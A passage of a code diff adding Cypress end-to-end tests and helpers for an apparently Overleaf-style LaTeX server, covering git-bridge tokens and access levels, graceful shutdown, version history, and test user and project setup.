clearAllTokens() + cy.get('button').contains('Generate token').should('exist') + cy.get('button').contains('Add another token').should('not.exist') + }) + + it('should render the git-bridge UI in the editor', function () { + maybeClearAllTokens() + createProject('git').as('projectId') + cy.get('header').findByText('Menu').click() + cy.findByText('Sync') + cy.findByText('Git').click() + cy.findByTestId('git-bridge-modal').within(() => { + cy.get('@projectId').then(id => { + cy.get('code').contains(`git clone ${gitURL(id.toString())}`) + }) + cy.findByRole('button', { + name: 'Generate token', + }).click() + cy.get('code').contains(/olp_[a-zA-Z0-9]{16}/) + }) + + // Re-open + cy.url().then(url => cy.visit(url)) + cy.get('header').findByText('Menu').click() + cy.findByText('Git').click() + cy.findByTestId('git-bridge-modal').within(() => { + cy.get('@projectId').then(id => { + cy.get('code').contains(`git clone ${gitURL(id.toString())}`) + }) + cy.findByText('Generate token').should('not.exist') + cy.findByText(/generate a new one in Account Settings/) + cy.findByText('Go to settings') + .should('have.attr', 'target', '_blank') + .and('have.attr', 'href', '/user/settings') + }) + }) + + describe('git access', () => { + ensureUserExists({ email: 'collaborator-rw@example.com' }) + ensureUserExists({ email: 'collaborator-ro@example.com' }) + ensureUserExists({ email: 'collaborator-link-rw@example.com' }) + ensureUserExists({ email: 'collaborator-link-ro@example.com' }) + + let projectName: string + beforeEach(() => { + projectName = uuid() + createProject(projectName, { open: false }).as('projectId') + }) + + it('should expose r/w interface to owner', () => { + maybeClearAllTokens() + openProjectByName(projectName) + checkGitAccess('readAndWrite') + }) + + it('should expose r/w interface to invited r/w collaborator', () => { + shareProjectByEmailAndAcceptInviteViaDash( + projectName, + 'collaborator-rw@example.com', + 'Editor' + ) + maybeClearAllTokens() + openProjectByName(projectName) + checkGitAccess('readAndWrite') + }) + + it('should expose r/o interface to invited r/o collaborator', () => { + shareProjectByEmailAndAcceptInviteViaDash( + projectName, + 'collaborator-ro@example.com', + 'Viewer' + ) + maybeClearAllTokens() + openProjectByName(projectName) + checkGitAccess('readOnly') + }) + + it('should expose r/w interface to link-sharing r/w collaborator', () => { + openProjectByName(projectName) + enableLinkSharing().then(({ linkSharingReadAndWrite }) => { + const email = 'collaborator-link-rw@example.com' + login(email) + maybeClearAllTokens() + openProjectViaLinkSharingAsUser( + linkSharingReadAndWrite, + projectName, + email + ) + checkGitAccess('readAndWrite') + }) + }) + + it('should expose r/o interface to link-sharing r/o collaborator', () => { + openProjectByName(projectName) + enableLinkSharing().then(({ linkSharingReadOnly }) => { + const email = 'collaborator-link-ro@example.com' + login(email) + maybeClearAllTokens() + openProjectViaLinkSharingAsUser( + linkSharingReadOnly, + projectName, + email + ) + checkGitAccess('readOnly') + }) + }) + }) + + function checkGitAccess(access: 'readOnly' | 'readAndWrite') { + const recompile = throttledRecompile() + + cy.get('header').findByText('Menu').click() + cy.findByText('Sync') + cy.findByText('Git').click() + cy.get('@projectId').then(projectId => { + cy.findByTestId('git-bridge-modal').within(() => { + cy.get('code').contains(`git clone ${gitURL(projectId.toString())}`) + }) + cy.findByRole('button', { + name: 'Generate token', + }).click() + cy.get('code') + .contains(/olp_[a-zA-Z0-9]{16}/) + .then(async tokenEl => { + const token = tokenEl.text() + + // close Git modal + cy.findAllByText('Close').last().click() + // close editor menu + cy.get('.left-menu-modal-backdrop').click() + + const fs = new LightningFS('fs') + const dir = `/${projectId}` + + async function readFile(path: string): Promise { + return new Promise((resolve, reject) => { + fs.readFile(path, { encoding: 'utf8' }, (err, blob) => { + if (err) return reject(err) + resolve(blob as string) + }) + }) + } + + async function writeFile(path: string, data: string) { + return new Promise((resolve, reject) => { + fs.writeFile(path, data, undefined, err => { + if (err) return reject(err) + resolve() + }) + }) + } + + const commonOptions = { + dir, + fs, + } + const url = gitURL(projectId.toString()) + url.username = '' // basic auth is specified separately. + const httpOptions = { + http, + url: url.toString(), + headers: { + Authorization: `Basic ${Buffer.from(`git:${token}`).toString('base64')}`, + }, + } + const authorOptions = { + author: { name: 'user', email: 'user@example.com' }, + committer: { name: 'user', email: 'user@example.com' }, + } + const mainTex = `${dir}/main.tex` + + // Clone + cy.then({ timeout: 10_000 }, async () => { + await git.clone({ + ...commonOptions, + ...httpOptions, + }) + }) + + cy.findByText(/\\documentclass/) + .parent() + .parent() + .then(async editor => { + const onDisk = await readFile(mainTex) + expect(onDisk.replaceAll('\n', '')).to.equal(editor.text()) + }) + + const text = ` +\\documentclass{article} +\\begin{document} +Hello world +\\end{document} +` + + // Make a change + cy.then(async () => { + await writeFile(mainTex, text) + await git.add({ + ...commonOptions, + filepath: 'main.tex', + }) + await git.commit({ + ...commonOptions, + ...authorOptions, + message: 'Swap main.tex', + }) + }) + + if (access === 'readAndWrite') { + // check history before push + cy.findAllByText('History').last().click() + cy.findByText('(via Git)').should('not.exist') + cy.findAllByText('Back to editor').last().click() + + cy.then(async () => { + await git.push({ + ...commonOptions, + ...httpOptions, + }) + }) + } else { + cy.then(async () => { + try { + await git.push({ + ...commonOptions, + ...httpOptions, + }) + expect.fail('push should have failed') + } catch (err) { + expect(err).to.match(/branches were not updated/) + expect(err).to.match(/forbidden/) + } + }) + + return // return early, below are write access bits + } + + // check push in editor + cy.findByText(/\\documentclass/) + .parent() + .parent() + .should('have.text', text.replaceAll('\n', '')) + + // Wait for history sync - trigger flush by toggling the UI + cy.findAllByText('History').last().click() + cy.findAllByText('Back to editor').last().click() + + // check push in history + cy.findAllByText('History').last().click() + cy.findByText(/Hello world/) + cy.findByText('(via Git)').should('exist') + + // Back to the editor + cy.findAllByText('Back to editor').last().click() + cy.findByText(/\\documentclass/) + .parent() + .parent() + .click() + .type('% via editor{enter}') + + // Trigger flush via compile + recompile() + + // Back into the history, check what we just added + cy.findAllByText('History').last().click() + cy.findByText(/% via editor/) + + // Pull the change + cy.then(async () => { + await git.pull({ + ...commonOptions, + ...httpOptions, + ...authorOptions, + }) + + expect(await readFile(mainTex)).to.equal(text + '% via editor\n') + }) + }) + }) + } + }) + + function checkDisabled() { + ensureUserExists({ email: 'user@example.com' }) + + it('should not render the git-bridge UI in the settings', () => { + login('user@example.com') + cy.visit('/user/settings') + cy.findByText('Git Integration').should('not.exist') + }) + it('should not render the git-bridge UI in the editor', function () { + login('user@example.com') + createProject('maybe git') + cy.get('header').findByText('Menu').click() + cy.findByText('Word Count') // wait for lazy loading + cy.findByText('Sync').should('not.exist') + cy.findByText('Git').should('not.exist') + }) + } + + describe('disabled in Server Pro', () => { + if (isExcludedBySharding('PRO_DEFAULT_1')) return + startWith({ + pro: true, + }) + checkDisabled() + }) + + describe('unavailable in CE', () => { + if (isExcludedBySharding('CE_CUSTOM_1')) return + startWith({ + pro: false, + vars: ENABLED_VARS, + }) + checkDisabled() + }) +}) diff --git a/server-ce/test/graceful-shutdown.spec.ts b/server-ce/test/graceful-shutdown.spec.ts new file mode 100644 index 0000000..40dc144 --- /dev/null +++ b/server-ce/test/graceful-shutdown.spec.ts @@ -0,0 +1,95 @@ +import { ensureUserExists, login } from './helpers/login' +import { + isExcludedBySharding, + STARTUP_TIMEOUT, + startWith, +} from './helpers/config' +import { dockerCompose, getRedisKeys } from './helpers/hostAdminClient' +import { createProject } from './helpers/project' +import { throttledRecompile } from './helpers/compile' + +const USER = 'user@example.com' +const PROJECT_NAME = 'Old Project' + +function bringServerProBackUp() { + cy.log('bring server pro back up') + cy.then({ timeout: STARTUP_TIMEOUT }, async () => { + await dockerCompose('up', '--detach', '--wait', 'sharelatex') + }) +} + +describe('GracefulShutdown', function () { + if (isExcludedBySharding('PRO_CUSTOM_1')) return + startWith({ + pro: true, + withDataDir: true, + resetData: true, + }) + ensureUserExists({ email: USER }) + + let projectId: string + it('should display banner and flush changes out of redis', () => { + bringServerProBackUp() + login(USER) + createProject(PROJECT_NAME).then(id => { + projectId = id + }) + const recompile = throttledRecompile() + + cy.log('add additional content') + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle').parent().type(`\n\\section{{}New Section}`) + recompile() + + cy.log( + 'check flush from frontend to backend: should include new section in PDF' + ) + cy.get('.pdf-viewer').should('contain.text', 'New Section') + + cy.log('should have unflushed content in redis before shutdown') + cy.then(async () => { + const keys = await getRedisKeys() + expect(keys).to.contain(`DocsIn:${projectId}`) + expect(keys).to.contain(`ProjectHistory:Ops:{${projectId}}`) + }) + + cy.log('trigger graceful shutdown') + let pendingShutdown: Promise + cy.then(() => { + pendingShutdown = dockerCompose('stop', '--timeout=60', 'sharelatex') + }) + + cy.log('wait for banner') + cy.findByText(/performing maintenance/) + cy.log('wait for page reload') + cy.findByText(/is currently down for maintenance/) + + cy.log('wait for shutdown to complete') + cy.then({ timeout: 60 * 1000 }, async () => { + await pendingShutdown + }) + + cy.log('should not have any unflushed content in redis after shutdown') + cy.then(async () => { + const keys = await getRedisKeys() + expect(keys).to.not.contain(`DocsIn:${projectId}`) + expect(keys).to.not.contain(`ProjectHistory:Ops:{${projectId}}`) + }) + + bringServerProBackUp() + + cy.then(() => { + cy.visit(`/project/${projectId}?trick-cypress-into-page-reload=true`) + }) + + cy.log('check loading doc from mongo') + cy.findByText('New Section') + + cy.log('check PDF') + cy.get('.pdf-viewer').should('contain.text', 'New Section') + + cy.log('check history') + cy.findByText('History').click() + cy.findByText(/\\section\{New Section}/) + }) +}) diff --git a/server-ce/test/helpers/beforeWithReRunOnTestRetry.ts b/server-ce/test/helpers/beforeWithReRunOnTestRetry.ts new file mode 100644 index 0000000..ce552c3 --- /dev/null +++ b/server-ce/test/helpers/beforeWithReRunOnTestRetry.ts @@ -0,0 +1,8 @@ +export function beforeWithReRunOnTestRetry(fn: () => void | Promise) { + let ranOnce = false + beforeEach(() => { + if (ranOnce && Cypress.currentRetry === 0) return + ranOnce = true + return fn() + }) +} diff --git a/server-ce/test/helpers/compile.ts b/server-ce/test/helpers/compile.ts new file mode 100644 index 0000000..9f0c9e4 --- /dev/null +++ b/server-ce/test/helpers/compile.ts @@ -0,0 +1,40 @@ +/** + * Helper function for throttling clicks on the recompile button to avoid hitting server side rate limits. + * The naive approach is waiting a fixed a mount of time (3s) just before clicking the button. + * This helper takes into account that other UI interactions take time. We can deduce that latency from the fixed delay (3s minus other latency). This can bring down the effective waiting time to 0s. + */ +export function throttledRecompile() { + const { queueReset, recompile } = prepareWaitForNextCompileSlot() + queueReset() + return recompile +} + +export function prepareWaitForNextCompileSlot() { + let lastCompile = 0 + function queueReset() { + cy.then(() => { + lastCompile = Date.now() + }) + } + function waitForCompileRateLimitCoolOff(triggerCompile: () => void) { + cy.then(() => { + cy.log('Wait for recompile rate-limit to cool off') + const msSinceLastCompile = Date.now() - lastCompile + cy.wait(Math.max(0, 1_000 - msSinceLastCompile)) + queueReset() + triggerCompile() + cy.log('Wait for compile to finish') + cy.findByText('Recompile').should('be.visible') + }) + } + function recompile() { + waitForCompileRateLimitCoolOff(() => { + cy.findByText('Recompile').click() + }) + } + return { + queueReset, + waitForCompileRateLimitCoolOff, + recompile, + } +} diff --git a/server-ce/test/helpers/config.ts b/server-ce/test/helpers/config.ts new file mode 100644 index 0000000..030e70c --- /dev/null +++ b/server-ce/test/helpers/config.ts @@ -0,0 +1,64 @@ +import { reconfigure } from './hostAdminClient' +import { resetActivateUserRateLimit, resetCreatedUsersCache } from './login' + +export const STARTUP_TIMEOUT = + parseInt(Cypress.env('STARTUP_TIMEOUT'), 10) || 120_000 + +export function isExcludedBySharding( + shard: + | 'CE_DEFAULT' + | 'CE_CUSTOM_1' + | 'CE_CUSTOM_2' + | 'PRO_DEFAULT_1' + | 'PRO_DEFAULT_2' + | 'PRO_CUSTOM_1' + | 'PRO_CUSTOM_2' + | 'PRO_CUSTOM_3' +) { + const SHARD = Cypress.env('SHARD') + return SHARD && shard !== SHARD +} + +let previousConfigFrontend: string + +export function startWith({ + pro = false, + version = 'latest', + vars = {}, + varsFn = () => ({}), + withDataDir = false, + resetData = false, +}) { + before(async function () { + Object.assign(vars, varsFn()) + const cfg = JSON.stringify({ + pro, + version, + vars, + withDataDir, + resetData, + }) + if (resetData) { + resetCreatedUsersCache() + resetActivateUserRateLimit() + // no return here, always reconfigure when resetting data + } else if (previousConfigFrontend === cfg) { + return + } + + this.timeout(STARTUP_TIMEOUT) + const { previousConfigServer } = await reconfigure({ + pro, + version, + vars, + withDataDir, + resetData, + }) + if (previousConfigServer !== cfg) { + await Cypress.session.clearAllSavedSessions() + } + previousConfigFrontend = cfg + }) +} + +export { reconfigure } diff --git a/server-ce/test/helpers/email.ts b/server-ce/test/helpers/email.ts new file mode 100644 index 0000000..036f746 --- /dev/null +++ b/server-ce/test/helpers/email.ts @@ -0,0 +1,39 @@ +/** + * Helper function for opening an email in Roundcube based mailtrap. + * We need to cross an origin boundary, which complicates the use of variables. + * Any variables need to be explicitly defined and the "runner" may only reference these and none from its scope. + * It is not possible to use Cypress helper functions, e.g. from the testing library or other functions like "activateUser", inside the "runner". + * REF: https://github.com/testing-library/cypress-testing-library/issues/221 + */ +export function openEmail( + subject: string | RegExp, + runner: (frame: Cypress.Chainable>, args: T) => void, + args?: T +) { + const runnerS = runner.toString() + cy.origin( + Cypress.env('MAILTRAP_URL') || 'http://mailtrap', + { args: { args, runnerS, subject } }, + ({ args, runnerS, subject }) => { + cy.visit('/') + cy.get('input[name="_user"]').type('mailtrap') + cy.get('input[name="_pass"]').type('password-for-mailtrap') + cy.get('button[type="submit"]').click() + cy.url().then(url => { + if (!url.includes('?_task=login')) return + cy.log('mailtrap login is flaky in cypress, submit again') + cy.get('input[name="_pass"]').type('password-for-mailtrap') + cy.get('button[type="submit"]').click() + }) + // Use force as the subject is partially hidden + cy.contains(subject).click({ force: true }) + cy.log('wait for iframe loading') + cy.wait(1000) + cy.get('iframe[id="messagecontframe"]').then(frame => { + // runnerS='(frame, args) => { runner body }'. Extract the runnable function. + const runner = new Function('return ' + runnerS)() + runner(cy.wrap(frame.prop('contentWindow').document.body), args) + }) + } + ) +} diff --git a/server-ce/test/helpers/hostAdminClient.ts b/server-ce/test/helpers/hostAdminClient.ts new file mode 100644 index 0000000..cafeaa2 --- /dev/null +++ b/server-ce/test/helpers/hostAdminClient.ts @@ -0,0 +1,92 @@ +const hostAdminURL = Cypress.env('HOST_ADMIN_URL') || 'http://host-admin' + +export async function dockerCompose(cmd: string, ...args: string[]) { + return await fetchJSON(`${hostAdminURL}/docker/compose/${cmd}`, { + method: 'POST', + body: JSON.stringify({ + args, + }), + }) +} + +export async function reconfigure({ + pro = false, + version = 'latest', + vars = {}, + withDataDir = false, + resetData = false, +}): Promise<{ previousConfigServer: string }> { + return await fetchJSON(`${hostAdminURL}/reconfigure`, { + method: 'POST', + body: JSON.stringify({ + pro, + version, + vars, + withDataDir, + resetData, + }), + }) +} + +async function fetchJSON( + input: RequestInfo, + init?: RequestInit +): Promise { + if (init?.body) { + init.headers = { 'Content-Type': 'application/json' } + } + let res + for (let attempt = 0; attempt < 5; attempt++) { + try { + res = await fetch(input, init) + break + } catch { + await sleep(3_000) + } + } + if (!res) { + res = await fetch(input, init) + } + const { error, stdout, stderr, ...rest } = await res.json() + if (error) { + console.error(input, init, 'failed:', error) + if (stdout) console.log(stdout) + if (stderr) console.warn(stderr) + const err = new Error(error.message) + Object.assign(err, error) + throw err + } + return { stdout, stderr, ...rest } +} + +export async function runScript({ + cwd, + script, + args = [], +}: { + cwd: string + script: string + args?: string[] +}) { + return await fetchJSON(`${hostAdminURL}/run/script`, { + method: 'POST', + body: JSON.stringify({ + cwd, + script, + args, + }), + }) +} + +export async function getRedisKeys() { + const { stdout } = await fetchJSON(`${hostAdminURL}/redis/keys`, { + method: 'GET', + }) + return stdout.split('\n') +} + +async function sleep(ms: number) { + return new Promise(resolve => { + setTimeout(resolve, ms) + }) +} diff --git a/server-ce/test/helpers/login.ts b/server-ce/test/helpers/login.ts new file mode 100644 index 0000000..fa95abe --- /dev/null +++ b/server-ce/test/helpers/login.ts @@ -0,0 +1,113 @@ +import { runScript } from './hostAdminClient' + +const DEFAULT_PASSWORD = 'Passw0rd!' + +const createdUsers = new Set() + +export function resetCreatedUsersCache() { + createdUsers.clear() +} + +export async function createMongoUser({ + email, + isAdmin = false, +}: { + email: string + isAdmin?: boolean +}) { + const t0 = Math.floor(Date.now() / 1000) + const { stdout } = await runScript({ + cwd: 'services/web', + script: 'modules/server-ce-scripts/scripts/create-user.js', + args: [`--email=${email}`, `--admin=${isAdmin}`], + }) + const [url] = stdout.match(/http:\/\/.+\/user\/activate\?token=\S+/)! + const userId = new URL(url, location.origin).searchParams.get('user_id')! + const signupDate = parseInt(userId.slice(0, 8), 16) + if (signupDate < t0) { + return { url, exists: true } + } + return { url, exists: false } +} + +export function ensureUserExists({ + email, + password = DEFAULT_PASSWORD, + isAdmin = false, +}: { + email: string + password?: string + isAdmin?: boolean +}) { + let url: string + let exists: boolean + before(async function () { + exists = createdUsers.has(email) + if (exists) return + ;({ url, exists } = await createMongoUser({ email, isAdmin })) + }) + before(function () { + if (exists) return + activateUser(url, password) + cy.then(() => { + createdUsers.add(email) + }) + }) +} + +export function login(username: string, password = DEFAULT_PASSWORD) { + cy.session( + [username, password], + () => { + cy.visit('/login') + cy.get('input[name="email"]').type(username) + cy.get('input[name="password"]').type(password) + cy.findByRole('button', { name: 'Login' }).click() + cy.url().should('contain', '/project') + }, + { + cacheAcrossSpecs: true, + async validate() { + // Hit a cheap endpoint that is behind AuthenticationController.requireLogin(). + cy.request({ url: '/user/personal_info', followRedirect: false }).then( + response => { + expect(response.status).to.equal(200) + } + ) + }, + } + ) +} + +let activateRateLimitState = { count: 0, reset: 0 } +export function resetActivateUserRateLimit() { + activateRateLimitState = { count: 0, reset: 0 } +} + +function handleActivateUserRateLimit() { + cy.then(() => { + activateRateLimitState.count++ + if (activateRateLimitState.reset < Date.now()) { + activateRateLimitState.reset = Date.now() + 65_000 + activateRateLimitState.count = 1 + } else if (activateRateLimitState.count >= 6) { + cy.wait(activateRateLimitState.reset - Date.now()) + activateRateLimitState.count = 1 + } + }) +} + +export function activateUser(url: string, password = DEFAULT_PASSWORD) { + handleActivateUserRateLimit() + + cy.session(url, () => { + cy.visit(url) + cy.url().then(url => { + if (url.includes('/login')) return + cy.url().should('contain', '/user/activate') + cy.get('input[name="password"]').type(password) + cy.findByRole('button', { name: 'Activate' }).click() + cy.url().should('contain', '/project') + }) + }) +} diff --git a/server-ce/test/helpers/project.ts b/server-ce/test/helpers/project.ts new file mode 100644 index 0000000..662327d --- /dev/null +++ b/server-ce/test/helpers/project.ts @@ -0,0 +1,251 @@ +import { login } from './login' +import { openEmail } from './email' +import { v4 as uuid } from 'uuid' + +export function createProject( + name: string, + { + type = 'Blank Project', + newProjectButtonMatcher = /new project/i, + open = true, + }: { + type?: 'Blank Project' | 'Example Project' + newProjectButtonMatcher?: RegExp + open?: boolean + } = {} +): Cypress.Chainable { + cy.url().then(url => { + if (!url.endsWith('/project')) { + cy.visit('/project') + } + }) + const interceptId = uuid() + let projectId = '' + if (!open) { + cy.then(() => { + // Register intercept just before creating the project, otherwise we might + // intercept a request from a prior createProject invocation. + cy.intercept( + { method: 'GET', url: /\/project\/[a-fA-F0-9]{24}$/, times: 1 }, + req => { + projectId = req.url.split('/').pop()! + // Redirect back to the project dashboard, effectively reload the page. + req.redirect('/project') + } + ).as(interceptId) + }) + } + cy.findAllByRole('button').contains(newProjectButtonMatcher).click() + // FIXME: This should only look in the left menu + cy.findAllByText(type).first().click() + cy.findByRole('dialog').within(() => { + cy.get('input').type(name) + cy.findByText('Create').click() + }) + if (open) { + cy.url().should('match', /\/project\/[a-fA-F0-9]{24}/) + waitForMainDocToLoad() + return cy + .url() + .should('match', /\/project\/[a-fA-F0-9]{24}/) + .then(url => url.split('/').pop()) + } else { + const alias = `@${interceptId}` // IDEs do not like computed values in cy.wait(). + cy.wait(alias) + return cy.then(() => projectId) + } +} + +export function openProjectByName(projectName: string) { + cy.visit('/project') + cy.findByText(projectName).click() + waitForMainDocToLoad() +} + +export function openProjectById(projectId: string) { + cy.visit(`/project/${projectId}`) + waitForMainDocToLoad() +} + +export function openProjectViaLinkSharingAsAnon(url: string) { + cy.visit(url) + waitForMainDocToLoad() +} + +export function openProjectViaLinkSharingAsUser( + url: string, + projectName: string, + email: string +) { + cy.visit(url) + cy.findByText(projectName) // wait for lazy loading + cy.contains(`as ${email}`) + cy.findByText('OK, join project').click() + waitForMainDocToLoad() +} + +export function openProjectViaInviteNotification(projectName: string) { + cy.visit('/project') + cy.findByText(projectName) + .parent() + .parent() + .within(() => { + cy.findByText('Join Project').click() + }) + cy.findByText('Open Project').click() + cy.url().should('match', /\/project\/[a-fA-F0-9]{24}/) + waitForMainDocToLoad() +} + +function shareProjectByEmail( + projectName: string, + email: string, + level: 'Viewer' | 'Editor' +) { + openProjectByName(projectName) + cy.findByText('Share').click() + cy.findByRole('dialog').within(() => { + cy.findByLabelText('Add people', { selector: 'input' }).type(`${email},`) + cy.findByLabelText('Add people', { selector: 'input' }) + .parents('form') + .within(() => { + cy.findByTestId('add-collaborator-select') + .click() + .then(() => { + cy.findByText(level).click() + }) + }) + cy.findByText('Invite').click({ force: true }) + cy.findByText('Invite not yet accepted.') + }) +} + +export function shareProjectByEmailAndAcceptInviteViaDash( + projectName: string, + email: string, + level: 'Viewer' | 'Editor' +) { + shareProjectByEmail(projectName, email, level) + + login(email) + openProjectViaInviteNotification(projectName) +} + +export function shareProjectByEmailAndAcceptInviteViaEmail( + projectName: string, + email: string, + level: 'Viewer' | 'Editor' +) { + shareProjectByEmail(projectName, email, level) + + login(email) + + openEmail(projectName, frame => { + frame.contains('View project').then(a => { + cy.log( + 'bypass target=_blank and navigate current browser tab/cypress-iframe to project invite' + ) + cy.visit(a.attr('href')!) + }) + }) + cy.url().should('match', /\/project\/[a-f0-9]+\/invite\/token\/[a-f0-9]+/) + cy.findByText(/user would like you to join/) + cy.contains(new RegExp(`You are accepting this invite as ${email}`)) + cy.findByText('Join Project').click() + waitForMainDocToLoad() +} + +export function enableLinkSharing() { + let linkSharingReadOnly: string + let linkSharingReadAndWrite: string + const origin = new URL(Cypress.config().baseUrl!).origin + + waitForMainDocToLoad() + + cy.findByText('Share').click() + cy.findByText('Turn on link sharing').click() + cy.findByText('Anyone with this link can view this project') + .next() + .should('contain.text', origin + '/read') + .then(el => { + linkSharingReadOnly = el.text() + }) + cy.findByText('Anyone with this link can edit this project') + .next() + .should('contain.text', origin + '/') + .then(el => { + linkSharingReadAndWrite = el.text() + }) + + return cy.then(() => { + return { linkSharingReadOnly, linkSharingReadAndWrite } + }) +} + +export function waitForMainDocToLoad() { + cy.log('Wait for main doc to load; it will steal the focus after loading') + cy.get('.cm-content').should('contain.text', 'Introduction') +} + +export function openFile(fileName: string, waitFor: string) { + // force: The file-tree pane is too narrow to display the full name. + cy.findByTestId('file-tree').findByText(fileName).click({ force: true }) + + // wait until we've switched to the selected file + cy.findByText('Loading…').should('not.exist') + cy.findByText(waitFor) +} + +export function createNewFile() { + const fileName = `${uuid()}.tex` + + cy.log('create new project file') + cy.get('button').contains('New file').click({ force: true }) + cy.findByRole('dialog').within(() => { + cy.get('input').clear() + cy.get('input').type(fileName) + cy.findByText('Create').click() + }) + // force: The file-tree pane is too narrow to display the full name. + cy.findByTestId('file-tree').findByText(fileName).click({ force: true }) + + // wait until we've switched to the newly created empty file + cy.findByText('Loading…').should('not.exist') + cy.get('.cm-line').should('have.length', 1) + + return fileName +} + +export function toggleTrackChanges(state: boolean) { + cy.findByText('Review').click() + cy.get('.track-changes-menu-button').then(el => { + // when the menu is expanded renders the `expand_more` icon, + // and the `chevron_right` icon when it's collapsed + if (!el.text().includes('expand_more')) { + el.click() + } + }) + + cy.findByText('Everyone') + .parent() + .within(() => { + cy.get('.form-check-input').then(el => { + if (el.prop('checked') === state) return + + const id = uuid() + const alias = `@${id}` + cy.intercept({ + method: 'POST', + url: '**/track_changes', + times: 1, + }).as(id) + if (state) { + cy.get('.form-check-input').check() + } else { + cy.get('.form-check-input').uncheck() + } + cy.wait(alias) + }) + }) + cy.contains('.toolbar-item', 'Review').click() +} diff --git a/server-ce/test/helpers/read-file.ts b/server-ce/test/helpers/read-file.ts new file mode 100644 index 0000000..15d032e --- /dev/null +++ b/server-ce/test/helpers/read-file.ts @@ -0,0 +1,52 @@ +import fs from 'fs' +import path from 'path' +import pdf from 'pdf-parse' +import AdmZip from 'adm-zip' +import { promisify } from 'util' + +const sleep = promisify(setTimeout) + +const MAX_ATTEMPTS = 15 +const POLL_INTERVAL = 500 + +type ReadFileInZipArgs = { + pathToZip: string + fileToRead: string +} + +export async function readFileInZip({ + pathToZip, + fileToRead, +}: ReadFileInZipArgs) { + let attempt = 0 + while (attempt < MAX_ATTEMPTS) { + if (fs.existsSync(pathToZip)) { + const zip = new AdmZip(path.resolve(pathToZip)) + const entry = zip + .getEntries() + .find(entry => entry.entryName == fileToRead) + if (entry) { + return entry.getData().toString('utf8') + } else { + throw new Error(`${fileToRead} not found in ${pathToZip}`) + } + } + await sleep(POLL_INTERVAL) + attempt++ + } + throw new Error(`${pathToZip} not found`) +} + +export async function readPdf(file: string) { + let attempt = 0 + while (attempt < MAX_ATTEMPTS) { + if (fs.existsSync(file)) { + const dataBuffer = fs.readFileSync(path.resolve(file)) + const { text } = await pdf(dataBuffer) + return text + } + await sleep(POLL_INTERVAL) + attempt++ + } + throw new Error(`${file} not found`) +} diff --git a/server-ce/test/helpers/waitUntilScrollingFinished.ts b/server-ce/test/helpers/waitUntilScrollingFinished.ts new file mode 100644 index 0000000..af4c565 --- /dev/null +++ b/server-ce/test/helpers/waitUntilScrollingFinished.ts @@ -0,0 +1,39 @@ +export function waitUntilScrollingFinished(selector: string, start = -1) { + const pollSlow = 100 + const pollFast = 10 + const deadline = + performance.now() + Cypress.config('defaultCommandTimeout') - pollSlow * 2 + return cy.get(selector).then(el => { + cy.log( + `waiting until scrolling finished for ${selector}, starting from ${start}` + ) + return new Cypress.Promise((resolve, reject) => { + const waitForStable = (prev: number, stableFor: number) => { + if (performance.now() > deadline) { + return reject(new Error('timeout waiting for scrolling to finish')) + } + const current = el.scrollTop()! + if (current !== prev) { + setTimeout(() => waitForStable(current, 0), pollFast) + } else if (stableFor < 5) { + setTimeout(() => waitForStable(current, stableFor + 1), pollFast) + } else { + resolve(current) + } + } + + const waitForChange = () => { + if (performance.now() > deadline) { + return reject(new Error('timeout waiting for scrolling to start')) + } + const current = el.scrollTop()! + if (current === start) { + setTimeout(() => waitForChange(), pollSlow) + } else { + setTimeout(() => waitForStable(current, 0), pollFast) + } + } + waitForChange() + }) + }) +} diff --git a/server-ce/test/history.spec.ts b/server-ce/test/history.spec.ts new file mode 100644 index 0000000..f0d7e74 --- /dev/null +++ b/server-ce/test/history.spec.ts @@ -0,0 +1,124 @@ +import { createProject } from './helpers/project' +import { throttledRecompile } from './helpers/compile' +import { ensureUserExists, login } from './helpers/login' +import { isExcludedBySharding, startWith } from './helpers/config' + +describe('History', function () { + if (isExcludedBySharding('CE_DEFAULT')) return + startWith({}) + ensureUserExists({ email: 'user@example.com' }) + beforeEach(function () { + login('user@example.com') + }) + + function addLabel(name: string) { + cy.log(`add label ${JSON.stringify(name)}`) + cy.findByText('Labels').click() + cy.findAllByTestId('history-version-details') + .first() + .within(() => { + cy.get('button').click() // TODO: add test-id or aria-label + cy.findByText('Label this version').click() + }) + cy.findByRole('dialog').within(() => { + cy.get('input[placeholder="New label name"]').type(`${name}{enter}`) + }) + } + + function downloadVersion(name: string) { + cy.log(`download version ${JSON.stringify(name)}`) + cy.findByText('Labels').click() + cy.findByText(name) + .closest('[data-testid="history-version-details"]') + .within(() => { + cy.get('.history-version-dropdown-menu-btn').click() + cy.findByText('Download this version').click() + }) + } + + const CLASS_ADDITION = 'ol-cm-addition-marker' + const CLASS_DELETION = 'ol-cm-deletion-marker' + + it('should support labels, comparison and download', () => { + createProject('labels') + const recompile = throttledRecompile() + + cy.log('add content, including a line that will get removed soon') + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle').parent().type('\n% added') + cy.findByText('\\maketitle').parent().type('\n% to be removed') + recompile() + cy.findByText('History').click() + + cy.log('expect to see additions in history') + cy.get('.document-diff-container').within(() => { + cy.findByText('% to be removed').should('have.class', CLASS_ADDITION) + cy.findByText('% added').should('have.class', CLASS_ADDITION) + }) + + addLabel('Before removal') + + cy.log('remove content') + cy.findByText('Back to editor').click() + cy.findByText('% to be removed').parent().type('{end}{shift}{upArrow}{del}') + recompile() + cy.findByText('History').click() + + cy.log('expect to see annotation for newly removed content in history') + cy.get('.document-diff-container').within(() => { + cy.findByText('% to be removed').should('have.class', CLASS_DELETION) + cy.findByText('% added').should('not.have.class', CLASS_ADDITION) + }) + + addLabel('After removal') + + cy.log('add more content after labeling') + cy.findByText('Back to editor').click() + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle').parent().type('\n% more') + recompile() + + cy.log('compare non current versions') + cy.findByText('History').click() + cy.findByText('Labels').click() + cy.findAllByTestId('compare-icon-version').last().click() + cy.findAllByTestId('compare-icon-version').filter(':visible').click() + cy.findByText('Compare up to this version').click() + + cy.log( + 'expect to see annotation for removed content between the two versions' + ) + cy.get('.document-diff-container').within(() => { + cy.findByText('% to be removed').should('have.class', CLASS_DELETION) + cy.findByText('% added').should('not.have.class', CLASS_ADDITION) + cy.findByText('% more').should('not.exist') + }) + + downloadVersion('Before removal') + cy.task('readFileInZip', { + pathToZip: `cypress/downloads/labels (Version 2).zip`, + fileToRead: 'main.tex', + }) + .should('contain', '% added') + .should('contain', '% to be removed') + .should('not.contain', '% more') + + downloadVersion('After removal') + cy.task('readFileInZip', { + pathToZip: `cypress/downloads/labels (Version 3).zip`, + fileToRead: 'main.tex', + }) + .should('contain', '% added') + .should('not.contain', 